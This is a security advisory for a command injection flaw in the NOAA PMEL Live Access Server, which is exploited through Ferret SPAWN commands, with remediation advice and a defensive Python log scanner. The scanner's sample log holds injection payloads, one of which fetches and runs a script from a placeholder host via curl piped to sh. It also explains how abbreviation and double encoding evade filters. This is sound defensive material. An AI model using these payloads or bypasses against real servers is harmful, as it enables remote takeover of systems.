CVE-2025-62193


A critical remote code execution vulnerability has been identified in sites running the NOAA PMEL Live Access Server.

Executive summary

CVE-2025-62193 is a critical remote code execution vulnerability in the NOAA PMEL Live Access Server (LAS). A remote, unauthenticated attacker can exploit it without any user interaction to execute arbitrary operating system commands on the server, which can lead to complete compromise of the affected host and of the data it serves.

Vulnerability

The NOAA PMEL Live Access Server (LAS) is susceptible to a command injection vulnerability. LAS requests can carry PyFerret expressions, and the request input filter fails to properly sanitize user-supplied data in those expressions. Ferret's SPAWN command runs its argument as a shell command, so a remote, unauthenticated attacker can construct a request that embeds a SPAWN command in a PyFerret expression; the server's Ferret/PyFerret backend executes it, resulting in arbitrary operating system command execution with the privileges of the LAS application.

Business impact

This vulnerability is rated as critical severity with a CVSS score of 9.8. Successful exploitation grants an attacker full control over the affected server, which can lead to severe consequences such as theft, modification, or destruction of sensitive scientific data; interruption of critical services; and using the compromised server as a foothold to launch further attacks against the internal network. The potential for data breach, operational disruption, and reputational damage presents a significant risk to the organization.

Remediation

Immediate Action: Apply the vendor-supplied patch to all vulnerable systems. Update every instance of NOAA PMEL Live Access Server to a version that includes the patched request input filter ('gov.noaa.pmel.tmap.las.filter.RequestInputFilter.java'). After patching, review web server and application access logs for requests whose PyFerret expressions contain a SPAWN command (in any letter case, and including abbreviated forms) to identify past or ongoing exploitation attempts.

Proactive Monitoring: Implement enhanced monitoring on affected servers. Configure alerts for web requests whose decoded parameters contain the Ferret SPAWN command or shell command strings where only a data expression is expected. Monitor for unusual child processes of the LAS application and its Ferret/PyFerret backend (e.g., sh, bash, cmd.exe, powershell). Monitor network traffic for unexpected outbound connections from the server, which could indicate a command-and-control (C2) channel.

Compensating Controls: If patching cannot be performed immediately, deploy a Web Application Firewall (WAF) rule that inspects requests for SPAWN command syntax. The rule must operate on the fully URL-decoded parameter value and match case-insensitively; Ferret accepts commands abbreviated to their first three letters, so a rule that looks only for the literal string SPAWN is trivially bypassed. Restrict network access to the application to trusted IP addresses only. Apply egress filtering on the server's firewall to prevent unauthorized outbound connections, which limits the impact of a successful exploit.
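The log review in Immediate Action, the alerting in Proactive Monitoring and the WAF predicate in Compensating Controls all come down to the same check: does the decoded request contain a Ferret SPAWN invocation? The script below is an added example written for this page; it is not code from the advisory or from LAS. It assumes the expression arrives in a URL-encoded query string (the endpoint path /las/ProductServer.do and the parameter name xml are placeholders), and the sample log lines are constructed, not real traffic. It deliberately handles the bypasses a literal SPAWN match would miss: mixed case, the three-letter abbreviation SPA, and double URL encoding.

```python
"""Scan access logs for requests carrying a Ferret SPAWN command.

Added example, not part of the advisory or of LAS itself. Endpoint path and
parameter name in the sample data are placeholders (assumed, not taken from
a real deployment).
"""
import re
from urllib.parse import unquote

# Combined log format: client, timestamp, request line, status code.
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Ferret commands are case-insensitive and may be abbreviated to their first
# three letters, so SPAWN, spawn, Spaw and SPA must all be caught. The
# trailing \b keeps identifiers such as SPAWN_RATE from matching.
SPAWN_CMD = re.compile(r'\bSPA(?:WN?)?\b', re.IGNORECASE)


def fully_decode(text, max_rounds=5):
    """URL-decode repeatedly until the value stops changing, so a
    double-encoded %2553PAWN is seen as SPAWN. The round cap bounds the
    work done on adversarial input."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def is_spawn_request(target):
    """Predicate shared by the log review and a WAF-style request check:
    True when the decoded request target contains a SPAWN invocation."""
    return SPAWN_CMD.search(fully_decode(target)) is not None


def scan_log(lines):
    """Return one finding per request that carries a SPAWN command."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m or not is_spawn_request(m['target']):
            continue
        decoded = fully_decode(m['target'])
        findings.append({
            'client': m['client'],
            'timestamp': m['ts'],
            'status': int(m['status']),
            'match': SPAWN_CMD.search(decoded).group(0),
            'decoded_target': decoded,
        })
    return findings


# Constructed sample lines (not real traffic). Line 1 is a benign request
# whose expression merely contains the identifier SPAWN_RATE; lines 2-4
# carry a command hidden by lower case, abbreviation and double encoding.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2025:12:00:01 +0000] "GET /las/ProductServer.do?xml=%3Cexpr%3ESPAWN_RATE%5Bi%3D1%3A10%5D%3C%2Fexpr%3E HTTP/1.1" 200 5120',
    '203.0.113.10 - - [10/Oct/2025:12:00:02 +0000] "GET /las/ProductServer.do?xml=%3Cexpr%3Esst%3B%20spawn%20%22id%22%3C%2Fexpr%3E HTTP/1.1" 200 118',
    '203.0.113.10 - - [10/Oct/2025:12:00:03 +0000] "GET /las/ProductServer.do?xml=%3Cexpr%3Esst%3B%20SPA%20%22uname%20-a%22%3C%2Fexpr%3E HTTP/1.1" 200 131',
    '203.0.113.22 - - [10/Oct/2025:12:00:04 +0000] "GET /las/ProductServer.do?xml=%3Cexpr%3Esst%3B%20%2553PAWN%20%22curl%20http%3A%2F%2F192.0.2.5%2Fx%7Csh%22%3C%2Fexpr%3E HTTP/1.1" 500 0',
]

if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']} {f['timestamp']} matched {f['match']!r}: "
              f"{f['decoded_target']}")
```

Run against the constructed sample, the benign SPAWN_RATE request is not reported while the three disguised commands are. Because access logs record only the request line, a POST body that carries the expression is not visible here; the same is_spawn_request predicate applied to the decoded body at the WAF or in application logs closes that gap.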

Exploitation status

Public Exploit Available: false

Analyst recommendation

This vulnerability represents an immediate and severe risk to the organization. The 9.8 CVSS base score reflects a flaw that is reachable over the network, requires no privileges and no user interaction, and has high confidentiality, integrity and availability impact, so patching should be treated as an emergency change and completed immediately. Although the CVE is not currently listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, an unauthenticated, pre-built command execution primitive of this kind is a prime candidate for active exploitation and future inclusion. Organizations must prioritize remediation of this flaw to prevent system compromise.